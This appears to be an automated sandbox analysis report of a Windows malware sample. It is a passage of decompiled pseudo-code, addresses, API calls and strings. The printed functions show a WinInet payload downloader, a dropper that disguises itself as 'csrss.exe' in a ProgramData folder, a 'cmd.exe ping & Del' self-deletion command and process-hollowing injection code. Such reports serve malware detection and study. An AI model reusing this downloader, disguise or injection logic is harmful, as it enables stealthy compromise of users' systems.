Instruction ID: 8b2c6ad6389722ad4d186c6c61001f468c4fd018603b84c5e18b7e3fb15685ad
Opcode Fuzzy Hash: 0cd67fea19399cdfc16dda180af005950f28b9e31626766ad2c06f3bb9fa3847
Instruction Fuzzy Hash: 5B010C71E0120CABDB10DFA0D948BDFBBF8EB04305F14419AE808F7280D7799A489BD5

Uniqueness

Uniqueness Score: -1.00%

Function 00401800, Relevance: 2.5, APIs: 2, Instructions: 31
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401800(intOrPtr* _a4) {
				void* _t5;
				void* _t8;
				void* _t9;
				void _t10;
				intOrPtr* _t11;
				void* _t12;

				_t11 = _a4;
				_t5 = 0;
				if( *_t11 != 0) {
					do {
						_t5 = _t5 + 1;
					} while ( *((char*)(_t5 + _t11)) != 0);
				}
				_t8 = HeapAlloc(GetProcessHeap(), 0, _t5 + 1);
				_t10 =  *_t11;
				_t9 = _t8;
				if(_t10 != 0) {
					_t12 = _t11 - _t8;
					do {
						 *_t9 = _t10;
						_t9 = _t9 + 1;
						_t10 =  *((intOrPtr*)(_t12 + _t9));
					} while (_t10 != 0);
				}
				 *_t9 = 0;
				return _t8;
			}

0x00401804
0x00401807
0x0040180b
0x00401810
0x00401810
0x00401811
0x00401810
0x00401822
0x00401828
0x0040182a
0x0040182e
0x00401830
0x00401832
0x00401832
0x00401834
0x00401837
0x0040183a
0x00401832
0x0040183e
0x00401843

APIs

GetProcessHeap.KERNEL32(00000000,00000001,?,?,004052B1,?), ref: 0040181B
HeapAlloc.KERNEL32(00000000,?,004052B1,?), ref: 00401822

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
Instruction ID: b73465cae51e9fc63f2ab920ad57f2ce1bbeed3a8eb4a9efde1b3dbfd0151c34
Opcode Fuzzy Hash: 3da18ee757283d3823c3ecc1c7d213f8c7222e7c0b475c9d3fce85658518ca9d
Instruction Fuzzy Hash: ECF055320092909EEB222F3488443727FE99F0B344F1C84EED8C59B3A2D63B8D48C394

Uniqueness

Uniqueness Score: -1.00%

Function 00406D50, Relevance: 1.5, APIs: 1, Instructions: 8
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D50() {
				void* _t1;

				_t1 =  *0x5d2df8; // 0x3f8
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}

0x00406d50
0x00406d57
0x00000000
0x00406d5f
0x00406d65

APIs

NtClose.NTDLL(000003F8), ref: 00406D5F

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
Instruction ID: 1cc971618bee3f163804a16a1d445a44e399e0157dcd427ad3a3562554af56f5
Opcode Fuzzy Hash: 9b87d2fed563e4884bb86ea922c3d925729189868286ecac45f0bef62ca048df
Instruction Fuzzy Hash: D6B0923070564157CE30AB38AC8CA1633685E6032132A0723F037E21E4EA38C8EAA61E

Uniqueness

Uniqueness Score: -1.00%

Function 00406D70, Relevance: 1.5, APIs: 1, Instructions: 8
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406D70() {
				void* _t1;

				_t1 =  *0x5d2dfc; // 0x40c
				if(_t1 != 0 && _t1 != 0xffffffff) {
					return NtClose(_t1);
				}
				return _t1;
			}

0x00406d70
0x00406d77
0x00000000
0x00406d7f
0x00406d85

APIs

NtClose.NTDLL(0000040C), ref: 00406D7F

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
Instruction ID: 76f8495102a0d5e2d14eb48cf16d234cca2194880bcae08c05adfe453fa08bf3
Opcode Fuzzy Hash: 63ba5de6b47e9ee9e8b3dcd5553fb007b603a39dc8debe5b0c00047f8c24c2ac
Instruction Fuzzy Hash: F4B092307055815BCE70AB79AC4CA1633686E603213150723A83BE12E4EA38C8AEA62D

Uniqueness

Uniqueness Score: -1.00%

Function 00407C30, Relevance: 45.7, APIs: 17, Strings: 9, Instructions: 241
networkCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00407C30(void* __ecx, void* __edx, void* __eflags, char* _a4, intOrPtr* _a8) {
				void _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				long _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				intOrPtr _v56;
				intOrPtr _v64;
				char* _v68;
				short _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v104;
				char _v108;
				void* _v112;
				long _t53;
				int _t54;
				void* _t62;
				void* _t63;
				void* _t72;
				long _t88;
				long _t103;
				char* _t108;
				intOrPtr _t109;
				char* _t111;
				void* _t114;
				long _t116;
				void* _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;

				E00401BB0( &_v108, 0, 0x38);
				_t108 = _a4;
				_v24 = 0;
				_t103 = 0;
				_v112 = 0x3c;
				_v92 = 0xffffffff;
				_v104 = 0xffffffff;
				_v64 = 0xffffffff;
				_v56 = 0xffffffff;
				_t53 = E00401850(_t108);
				_t125 = _t123 + 0x10;
				_t54 = InternetCrackUrlA(_t108, _t53, 0,  &_v112);
				if(_t54 != 0) {
					_t111 = E004015E0(_v92 + 1);
					E00401BB0(_t111, 0, _v92 + 1);
					E00401640(_t111, _v96, _v92);
					_t126 = _t125 + 0x1c;
					_t62 = InternetOpenA("WinInetGet/0.1", 0, 0, 0, 0);
					_v20 = _t62;
					if(_t62 != 0) {
						_t63 = InternetConnectA(_t62, _t111, _v88, 0, 0, 3, 0, 0);
						_v16 = _t63;
						_push(_t111);
						if(_t63 != 0) {
							E00401510();
							E004018D0(_t108, "https://");
							_t127 = _t126 + 0xc;
							_v52 = "text/*";
							_v48 = "application/exe";
							_v44 = "application/zlib";
							_t113 =  !=  ? 0x84ecf300 : 0x846cf300;
							_v40 = "application/gzip";
							_v36 = "application/applefile";
							_v32 = 0;
							_t114 = HttpOpenRequestA(_v16, "GET", _v68, 0, 0,  &_v52,  !=  ? 0x84ecf300 : 0x846cf300, 0);
							_v12 = _t114;
							if(_t114 == 0) {
								L24:
								InternetCloseHandle(_v16);
								InternetCloseHandle(_v20);
								return 0;
							} else {
								_t72 = E004018D0(_t108, "https://");
								_t128 = _t127 + 8;
								if(_t72 == 0) {
									L10:
									if(HttpSendRequestA(_t114, 0, 0, 0, 0) == 0) {
										goto L23;
									} else {
										_t116 = 0x400;
										_t109 = E004015E0(0x400);
										_t129 = _t128 + 4;
										if(_t109 == 0) {
											_t114 = _v12;
											goto L23;
										} else {
											do {
												if(InternetReadFile(_v12, _t109 + _t103, _t116,  &_v24) == 0) {
													if(GetLastError() != 0x7a) {
														E00401510(_t109);
														L21:
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														return 0;
													} else {
														_t116 = _t116 + 0x400;
														goto L15;
													}
												} else {
													_t88 = _v24;
													if(_t88 == 0) {
														InternetCloseHandle(_v12);
														InternetCloseHandle(_v16);
														InternetCloseHandle(_v20);
														 *_a8 = _t109;
														return _t103;
													} else {
														_t103 = _t103 + _t88;
														goto L15;
													}
												}
												goto L25;
												L15:
												_t109 = E004016A0(_t109, _t116 + _t103);
												_t129 = _t129 + 8;
											} while (_t109 != 0);
											goto L21;
										}
									}
								} else {
									_v8 = 0;
									_v28 = 4;
									if(InternetQueryOptionA(_t114, 0x1f,  &_v8,  &_v28) == 0) {
										L23:
										InternetCloseHandle(_t114);
										goto L24;
									} else {
										_v8 = _v8 | 0x00000180;
										if(InternetSetOptionA(_t114, 0x1f,  &_v8, 4) == 0) {
											goto L23;
										} else {
											goto L10;
										}
									}
								}
							}
						} else {
							E00401510();
							InternetCloseHandle(_v20);
							return 0;
						}
					} else {
						E00401510(_t111);
						return 0;
					}
				} else {
					return _t54;
				}
				L25:
			}

0x00407c40
0x00407c45
0x00407c4e
0x00407c55
0x00407c57
0x00407c5e
0x00407c65
0x00407c6f
0x00407c76
0x00407c7d
0x00407c82
0x00407c87
0x00407c8f
0x00407ca2
0x00407cac
0x00407cb8
0x00407cbd
0x00407ccd
0x00407cd3
0x00407cd8
0x00407cfb
0x00407d01
0x00407d04
0x00407d07
0x00407d23
0x00407d33
0x00407d38
0x00407d3b
0x00407d44
0x00407d50
0x00407d57
0x00407d5a
0x00407d67
0x00407d76
0x00407d87
0x00407d89
0x00407d8e
0x00407eb2
0x00407eb5
0x00407ec3
0x00407ecd
0x00407d94
0x00407d9a
0x00407d9f
0x00407da4
0x00407de7
0x00407df8
0x00000000
0x00407dfe
0x00407dfe
0x00407e09
0x00407e0b
0x00407e10
0x00407ea7
0x00000000
0x00407e16
0x00407e16
0x00407e2a
0x00407e53
0x00407e81
0x00407e89
0x00407e92
0x00407e97
0x00407e9c
0x00407ea6
0x00407e55
0x00407e55
0x00000000
0x00407e55
0x00407e2c
0x00407e2c
0x00407e31
0x00407e66
0x00407e6b
0x00407e70
0x00407e78
0x00407e7f
0x00407e33
0x00407e33
0x00000000
0x00407e33
0x00407e31
0x00000000
0x00407e35
0x00407e3f
0x00407e41
0x00407e44
0x00000000
0x00407e48
0x00407e10
0x00407da6
0x00407da9
0x00407db0
0x00407dc3
0x00407eaa
0x00407eb0
0x00000000
0x00407dc9
0x00407dc9
0x00407de1
0x00000000
0x00000000
0x00000000
0x00000000
0x00407de1
0x00407dc3
0x00407da4
0x00407d09
0x00407d09
0x00407d14
0x00407d22
0x00407d22
0x00407cda
0x00407cdb
0x00407ceb
0x00407ceb
0x00407c96
0x00407c96
0x00407c96
0x00000000

APIs

InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87
InternetOpenA.WININET(WinInetGet/0.1,00000000,00000000,00000000,00000000), ref: 00407CCD

Strings

application/exe, xrefs: 00407D44
text/*, xrefs: 00407D3B
GET, xrefs: 00407D79
WinInetGet/0.1, xrefs: 00407CC8
https://, xrefs: 00407D94
application/gzip, xrefs: 00407D5A
application/zlib, xrefs: 00407D50
application/applefile, xrefs: 00407D67
https://, xrefs: 00407D28

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Internet$CrackOpen
String ID: GET$WinInetGet/0.1$application/applefile$application/exe$application/gzip$application/zlib$https://$https://$text/*
API String ID: 1262293563-1634511642
Opcode ID: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
Instruction ID: 4be7173def1fabf2422f7d93ddf0ca221e4e961e0538c85c9162d68e93896e62
Opcode Fuzzy Hash: f6c8cf70005e460737aeb64da07ddfed1755531fa4350254e23b284514829349
Instruction Fuzzy Hash: BD71E471E00209BBEB10AFA1ED45BAEBBB8EF44324F104176F904F62D1D7796D10CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004076A0, Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 284
fileCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E004076A0(short __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16) {
				char _v8;
				struct _PROCESS_INFORMATION _v24;
				struct _STARTUPINFOW _v92;
				short _v1116;
				char _v1636;
				short _v4196;
				void* _t53;
				WCHAR* _t54;
				WCHAR* _t56;
				WCHAR* _t58;
				WCHAR* _t59;
				WCHAR* _t60;
				signed int _t62;
				WCHAR* _t66;
				WCHAR* _t81;
				WCHAR* _t82;
				void* _t87;
				void* _t88;
				WCHAR* _t103;
				WCHAR* _t107;
				WCHAR* _t110;
				int _t115;
				signed int _t120;
				WCHAR* _t121;
				WCHAR* _t122;
				void* _t140;
				intOrPtr* _t141;
				WCHAR* _t143;
				void* _t146;
				void* _t147;
				void* _t148;
				void* _t149;
				void* _t151;
				void* _t152;
				void* _t153;
				void* _t155;
				void* _t156;

				_t130 = __ecx;
				_t148 = _t147 - 0x1060;
				_t156 =  *0x5d2e00 - 0xc350; // 0x0
				if(_t156 >= 0) {
					L39:
					__eflags = 0;
					return 0;
				} else {
					_t157 =  *0x5d1c4c;
					if( *0x5d1c4c == 0) {
						goto L39;
					} else {
						E00401BB0( &_v92, 0, 0x44);
						asm("xorps xmm0, xmm0");
						asm("movups [ebp-0x14], xmm0");
						_t53 = E00407C30(_t130, __edx, _t157, _a4,  &_v8);
						_t135 = _t53;
						_t149 = _t148 + 0x14;
						if(_t53 != 0) {
							_t141 = __imp__GetLongPathNameW;
							_t54 =  *_t141("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", 0x200, _t140);
							__eflags = _t54;
							if(_t54 == 0) {
								L37:
								_push(_v8);
								goto L38;
							} else {
								__eflags = _t54 - 0x200;
								if(_t54 > 0x200) {
									goto L37;
								} else {
									_t56 = E00401A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "C:\ProgramData\LKBNMTFJgl");
									_t149 = _t149 + 8;
									__eflags = _t56;
									if(_t56 != 0) {
										L10:
										_t58 = GetTempPathW(0x200,  &_v1116);
										__eflags = _t58;
										if(_t58 == 0) {
											goto L37;
										} else {
											__eflags = _t58 - 0x200;
											if(_t58 > 0x200) {
												goto L37;
											} else {
												_t59 =  &_v1116;
												_t60 =  *_t141(_t59, _t59, 0x200);
												__eflags = _t60;
												if(_t60 == 0) {
													goto L37;
												} else {
													__eflags = _t60 - 0x200;
													if(_t60 > 0x200) {
														goto L37;
													} else {
														_t62 = E00401B40( &_v1116);
														_t151 = _t149 + 4;
														__eflags =  *((short*)(_t146 + _t62 * 2 - 0x45a)) - 0x5c;
														if( *((short*)(_t146 + _t62 * 2 - 0x45a)) != 0x5c) {
															 *((short*)(_t146 + E00401B40( &_v1116) * 2 - 0x458)) = 0x5c;
															_t120 = E00401B40( &_v1116);
															_t151 = _t151 + 8;
															_t130 = 0;
															__eflags = 0;
															 *((short*)(_t146 + _t120 * 2 - 0x456)) = 0;
														}
														E00401970( &_v1116, "csrss.exe");
														_t152 = _t151 + 8;
														goto L17;
													}
												}
											}
										}
									} else {
										_t121 = E00401A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", L"ProgramData");
										_t149 = _t149 + 8;
										__eflags = _t121;
										if(_t121 != 0) {
											goto L10;
										} else {
											_t122 = E00401A30("C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe", "LKBNMTFJgl");
											_t149 = _t149 + 8;
											__eflags = _t122;
											if(_t122 != 0) {
												goto L10;
											} else {
												E00401A00( &_v1116, "C:\ProgramData\LKBNMTFJgl");
												E00401970( &_v1116, "\\");
												E00401970( &_v1116, "csrss.exe");
												_t152 = _t149 + 0x18;
												E00406D50();
												L17:
												_t66 = E004087C0( &_v1116, _v8, _t135);
												_t149 = _t152 + 0xc;
												_push(_v8);
												__eflags = _t66;
												if(_t66 == 0) {
													L38:
													E00401510();
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													__eflags =  *0x5d2e00;
													goto L39;
												} else {
													E00401510();
													_t143 = E004015E0(0x24);
													_t153 = _t149 + 8;
													__eflags = _t143;
													if(_t143 != 0) {
														_t81 = E00408B20( &_v1116, _t143);
														_t155 = _t153 + 8;
														__eflags = _t81;
														if(_t81 != 0) {
															_t143[0x10] = 0;
															_t82 = E00401740(_t143, _a16);
															_t155 = _t155 + 8;
															_push(_t143);
															__eflags = _t82;
															if(_t82 != 0) {
																goto L21;
															} else {
																E00401510();
																_t153 = _t155 + 4;
																__eflags =  *0x5d1300;
																if( *0x5d1300 == 0) {
																	L29:
																	__eflags = _a12;
																	if(_a12 != 0) {
																		E00408730(_a8);
																		_t153 = _t153 + 4;
																	}
																	 *0x5d2118 = 1;
																	_t87 =  *0x5d211c; // 0x22c
																	__eflags = _t87;
																	if(_t87 == 0) {
																		L33:
																		_t88 =  *0x5d2120; // 0x0
																		__eflags = _t88;
																		if(_t88 != 0) {
																			TerminateThread(_t88, 0);
																		}
																		E00401A00( &_v4196, L"cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q \"");
																		E00401970( &_v4196, "C:\Users\jones\AppData\Local\Temp\tmp70CEtmp.exe");
																		E00401970( &_v4196, L"\" & \"");
																		E00401970( &_v4196,  &_v1116);
																		E00401970( &_v4196, "\"");
																		_t153 = _t153 + 0x28;
																		_t103 = CreateProcessW(0,  &_v4196, 0, 0, 0, 0x8000000, 0, 0,  &_v92,  &_v24);
																		__eflags = _t103;
																		if(_t103 != 0) {
																			CloseHandle(_v24.hThread);
																			CloseHandle(_v24);
																			ExitProcess(0);
																		}
																	} else {
																		_t107 = WaitForSingleObject(_t87, 0xea60);
																		__eflags = _t107;
																		if(_t107 == 0) {
																			goto L33;
																		}
																	}
																} else {
																	_t143 = E004015E0(0x400);
																	_t153 = _t153 + 4;
																	__eflags = _t143;
																	if(_t143 != 0) {
																		_t110 = E00407FA0(_t130, _t143, 0x40aad0, 7);
																		_t155 = _t153 + 0xc;
																		__eflags = _t110;
																		if(_t110 == 0) {
																			goto L20;
																		} else {
																			E00401970(_t143, "\\");
																			E00401970(_t143, "viTRMUuKeV");
																			E00401970(_t143, L".url");
																			_t155 = _t155 + 0x18;
																			E00406D70();
																			_t115 = DeleteFileW(_t143);
																			_push(_t143);
																			__eflags = _t115;
																			if(_t115 == 0) {
																				goto L21;
																			} else {
																				E00401510();
																				_t153 = _t155 + 4;
																				goto L29;
																			}
																		}
																	}
																}
															}
														} else {
															L20:
															_push(_t143);
															L21:
															E00401510();
															_t153 = _t155 + 4;
														}
													}
													DeleteFileW( &_v1116);
													 *0x5d2e00 =  &(( *0x5d2e00)[0]);
													E00401A00( &_v1636, "C:\ProgramData\LKBNMTFJgl");
													E00401970( &_v1636, "\\");
													E00401970( &_v1636, "csrss.exe");
													E00406340( &_v1636);
													__eflags = 0;
													return 0;
												}
											}
										}
									}
								}
							}
						} else {
							 *0x5d2e00 =  &(( *0x5d2e00)[0]);
							return _t53;
						}
					}
				}
			}

0x004076a0
0x004076a8
0x004076ae
0x004076b5
0x00407a92
0x00407a92
0x00407a97
0x004076bb
0x004076bb
0x004076c3
0x00000000
0x004076c9
0x004076d2
0x004076da
0x004076e1
0x004076e5
0x004076ea
0x004076ec
0x004076f1
0x00407700
0x00407715
0x00407717
0x00407719
0x00407a7e
0x00407a7e
0x00000000
0x0040771f
0x0040771f
0x00407724
0x00000000
0x0040772a
0x00407734
0x00407739
0x0040773c
0x0040773e
0x004077ac
0x004077b8
0x004077be
0x004077c0
0x00000000
0x004077c6
0x004077c6
0x004077cb
0x00000000
0x004077d1
0x004077d6
0x004077de
0x004077e0
0x004077e2
0x00000000
0x004077e8
0x004077e8
0x004077ed
0x00000000
0x004077f3
0x004077fa
0x004077ff
0x00407802
0x0040780b
0x0040781e
0x0040782d
0x00407832
0x00407835
0x00407835
0x00407837
0x00407837
0x0040784b
0x00407850
0x00000000
0x00407850
0x004077ed
0x004077e2
0x004077cb
0x00407740
0x0040774a
0x0040774f
0x00407752
0x00407754
0x00000000
0x00407756
0x00407760
0x00407765
0x00407768
0x0040776a
0x00000000
0x0040776c
0x00407778
0x00407789
0x0040779a
0x0040779f
0x004077a2
0x00407853
0x0040785e
0x00407863
0x00407866
0x00407869
0x0040786b
0x00407a81
0x00407a81
0x00407a89
0x00407a89
0x00000000
0x00407871
0x00407871
0x00407883
0x00407885
0x00407888
0x0040788a
0x00407894
0x00407899
0x0040789c
0x0040789e
0x00407906
0x0040790b
0x00407910
0x00407913
0x00407914
0x00407916
0x00000000
0x00407918
0x00407918
0x0040791d
0x00407920
0x00407927
0x00407995
0x00407995
0x00407999
0x0040799e
0x004079a3
0x004079a3
0x004079ad
0x004079af
0x004079b4
0x004079b6
0x004079cc
0x004079cc
0x004079d1
0x004079d3
0x004079d8
0x004079d8
0x004079ea
0x004079fb
0x00407a0c
0x00407a1f
0x00407a30
0x00407a35
0x00407a58
0x00407a5e
0x00407a60
0x00407a6f
0x00407a74
0x00407a78
0x00407a78
0x004079b8
0x004079be
0x004079c4
0x004079c6
0x00000000
0x00000000
0x004079c6
0x00407929
0x00407933
0x00407935
0x00407938
0x0040793a
0x00407948
0x0040794d
0x00407950
0x00407952
0x00000000
0x00407958
0x0040795e
0x00407969
0x00407974
0x00407979
0x0040797c
0x00407982
0x00407984
0x00407985
0x00407987
0x00000000
0x0040798d
0x0040798d
0x00407992
0x00000000
0x00407992
0x00407987
0x00407952
0x0040793a
0x00407927
0x004078a0
0x004078a0
0x004078a0
0x004078a1
0x004078a1
0x004078a6
0x004078a6
0x0040789e
0x004078b0
0x004078b2
0x004078c5
0x004078d6
0x004078e7
0x004078f3
0x004078fb
0x00407902
0x00407902
0x0040786b
0x0040776a
0x00407754
0x0040773e
0x00407724
0x004076f3
0x004076f3
0x004076fe
0x004076fe
0x004076f1
0x004076c3

APIs

Part of subcall function 00407C30: InternetCrackUrlA.WININET(00000044,00000000,?), ref: 00407C87

GetLongPathNameW.KERNEL32 ref: 00407715
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004078B0

Strings

C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe, xrefs: 004076BB, 0040770B, 00407710, 0040772F, 00407745, 0040775B, 004079F5
C:\ProgramData\LKBNMTFJgl, xrefs: 0040772A, 00407772, 004078BF
csrss.exe, xrefs: 00407794, 00407845, 004078E1
.url, xrefs: 0040796E
zJ@, xrefs: 004076A0
LKBNMTFJgl, xrefs: 00407756
" & ", xrefs: 00407A06
ProgramData, xrefs: 00407740
cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q ", xrefs: 004079E4
viTRMUuKeV, xrefs: 00407963

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CrackDeleteFileInternetLongNamePath
String ID: " & "$.url$C:\ProgramData\LKBNMTFJgl$C:\Users\user\AppData\Local\Temp\tmp70CEtmp.exe$LKBNMTFJgl$ProgramData$cmd.exe /C ping 1.1.1.1 -n 8 -w 3000 > Nul & Del /f /q "$csrss.exe$viTRMUuKeV$zJ@
API String ID: 3724707802-2811287362
Opcode ID: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
Instruction ID: 401daa4757a0587c7b000174fcf8883a011eebc5c06fd5704f7b7c2f209f5124
Opcode Fuzzy Hash: 6894e1fd763ebf7c80e388c5e2625915a5104925a43bcd60d952a30ebe1ee402
Instruction Fuzzy Hash: 1C91B9B1E4420876DB20B7A59C06FDB376CAF00745F04007BF904B21D2EA7CBA54CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00405B80, Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 237
threadsleepprocessCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00405B80(void* __ebx, void* __ecx, void* __eflags, WCHAR* _a4) {
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void _v28;
				long _v32;
				char _v36;
				intOrPtr _v40;
				void* _v44;
				char _v112;
				struct _CONTEXT _v828;
				intOrPtr _t62;
				void* _t70;
				void* _t72;
				void* _t81;
				void* _t82;
				void* _t84;
				signed int _t85;
				void* _t90;
				void* _t94;
				void* _t95;
				void* _t108;
				void* _t115;
				void* _t117;
				void _t120;
				intOrPtr _t123;
				void* _t126;
				void* _t132;
				void* _t133;
				intOrPtr* _t136;
				void* _t137;
				void* _t138;
				void* _t142;
				void* _t143;

				_t115 = __ebx;
				E00401BB0( &(_v828.Dr0), 0, 0x2c8);
				_v28 = 0;
				_t138 = _t137 + 0xc;
				_v32 = 0;
				_v828.ContextFlags = 0x10007;
				_t142 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t142 == 0) {
					L3:
					_t62 =  *0x40c074; // 0x383538b7
					__eflags =  *((intOrPtr*)(_t62 + 0x40c038)) - 0x4550;
					_t6 = _t62 + 0x40c038; // 0x3875f8ef
					_t126 = _t6;
					if( *((intOrPtr*)(_t62 + 0x40c038)) != 0x4550) {
						L27:
						__eflags = 0;
						return 0;
					} else {
						E00401670( &_v112, 0, 0x44);
						E00401670( &_v20, 0, 0x10);
						_v112 = 0x44;
						__eflags =  *0x5d1bb8;
						_push( &_v20);
						_push( &_v112);
						_push(0);
						_push(0);
						if( *0x5d1bb8 == 0) {
							_push(0x14);
						} else {
							_push(0x800000c);
						}
						_t70 = CreateProcessW(0, _a4, 0, 0, 0, ??, ??, ??, ??, ??);
						__eflags = _t70;
						if(_t70 == 0) {
							goto L27;
						} else {
							_push(_t115);
							_t14 =  &_v16; // 0x4049e6
							_t72 = GetThreadContext( *_t14,  &_v828);
							__eflags = _t72;
							if(_t72 == 0) {
								L26:
								TerminateProcess(_v20, 0);
								CloseHandle(_v16);
								CloseHandle(_v20);
								__eflags = 0;
								return 0;
							} else {
								_t81 = ReadProcessMemory(_v20, _v828.Ebx + 8,  &_v28, 4,  &_v32);
								__eflags = _t81;
								if(_t81 == 0) {
									goto L26;
								} else {
									_t123 =  *((intOrPtr*)(_t126 + 0x34));
									_t120 = _v28;
									__eflags = _t120 - _t123;
									if(__eflags < 0) {
										L13:
										_t82 = E004072C0(__eflags, _v20,  *((intOrPtr*)(_t126 + 0x34)), 0,  *((intOrPtr*)(_t126 + 0x50)), 0x3000, 0x40);
										_t132 = _t82;
										_v24 = _t132;
										__eflags = _t132;
										if(_t132 == 0) {
											goto L26;
										} else {
											asm("cdq");
											_t124 =  &_v36;
											_v44 = _t82;
											_v40 = _t123;
											_t84 = E004074D0(_t82,  &_v36, _v20, _t82, _t123, 0x40c038,  *((intOrPtr*)(_t126 + 0x54)),  &_v36);
											__eflags = _t84;
											if(_t84 == 0) {
												goto L26;
											} else {
												_t85 =  *(_t126 + 0x14) & 0x0000ffff;
												_t117 = 0;
												__eflags = 0 -  *(_t126 + 6);
												if(0 >=  *(_t126 + 6)) {
													L20:
													_t42 = _t126 + 0x34; // 0x3875f923
													_t90 = E004074D0(0, _t124, _v20, _v828.Ebx + 8, 0, _t42, 4,  &_v36);
													__eflags = _t90;
													if(_t90 == 0) {
														goto L26;
													} else {
														_v828.Eax =  *((intOrPtr*)(_t126 + 0x28)) + _t132;
														_t94 = SetThreadContext(_v16,  &_v828);
														__eflags = _t94;
														if(_t94 == 0) {
															goto L26;
														} else {
															_t95 = E004071A0(0, _t124, _v16);
															__eflags = _t95;
															if(_t95 == 0) {
																goto L26;
															} else {
																Sleep(0x1388);
																_t133 = VirtualAlloc(0, 0x138, 0x3000, 4);
																__eflags = _t133;
																if(_t133 != 0) {
																	E00401BB0(_t133, 0, 0x138);
																	E004074D0(0, _t124, _v20, _v44, _v40, _t133, 0x138,  &_v24);
																	VirtualFree(_t133, 0, 0x8000);
																}
																CloseHandle(_v16);
																CloseHandle(_v20);
																return _v12;
															}
														}
													}
												} else {
													_t34 = _t126 + 0x2c; // 0x3875f91b
													_t136 = _t34 + _t85;
													asm("o16 nop [eax+eax]");
													while(1) {
														_t108 = E004074D0(0, _t124, _v20,  *((intOrPtr*)(_t136 - 8)) + _v24, 0,  *_t136 + 0x40c038,  *((intOrPtr*)(_t136 - 4)), 0);
														__eflags = _t108;
														if(_t108 == 0) {
															goto L26;
														}
														_t117 = _t117 + 1;
														_t136 = _t136 + 0x28;
														__eflags = _t117 - ( *(_t126 + 6) & 0x0000ffff);
														if(_t117 < ( *(_t126 + 6) & 0x0000ffff)) {
															continue;
														} else {
															_t132 = _v24;
															goto L20;
														}
														goto L28;
													}
													goto L26;
												}
											}
										}
									} else {
										__eflags = _t120 -  *((intOrPtr*)(_t126 + 0x50)) + _t123;
										if(__eflags > 0) {
											goto L13;
										} else {
											__eflags = E00407120(_t123, _v20, _t120, 0);
											if(__eflags != 0) {
												goto L26;
											} else {
												goto L13;
											}
										}
									}
								}
							}
						}
					}
				} else {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t138 = _t138 + 0x10;
					_t143 =  *0x40c038 - 0x5a4d; // 0x6b7d
					if(_t143 == 0) {
						goto L3;
					} else {
						return 0;
					}
				}
				L28:
			}

0x00405b80
0x00405b98
0x00405ba2
0x00405ba9
0x00405bac
0x00405bb3
0x00405bbd
0x00405bc4
0x00405bef
0x00405bef
0x00405bf4
0x00405bff
0x00405bff
0x00405c05
0x00405e53
0x00405e54
0x00405e5a
0x00405c0b
0x00405c13
0x00405c20
0x00405c28
0x00405c2f
0x00405c39
0x00405c3d
0x00405c3e
0x00405c40
0x00405c42
0x00405c4b
0x00405c44
0x00405c44
0x00405c44
0x00405c58
0x00405c5e
0x00405c60
0x00000000
0x00405c66
0x00405c66
0x00405c6e
0x00405c71
0x00405c77
0x00405c79
0x00405e2f
0x00405e34
0x00405e43
0x00405e48
0x00405e4c
0x00405e52
0x00405c7f
0x00405c96
0x00405c9c
0x00405c9e
0x00000000
0x00405ca4
0x00405ca4
0x00405ca7
0x00405caa
0x00405cac
0x00405cca
0x00405cdc
0x00405ce1
0x00405ce3
0x00405ce6
0x00405ce8
0x00000000
0x00405cee
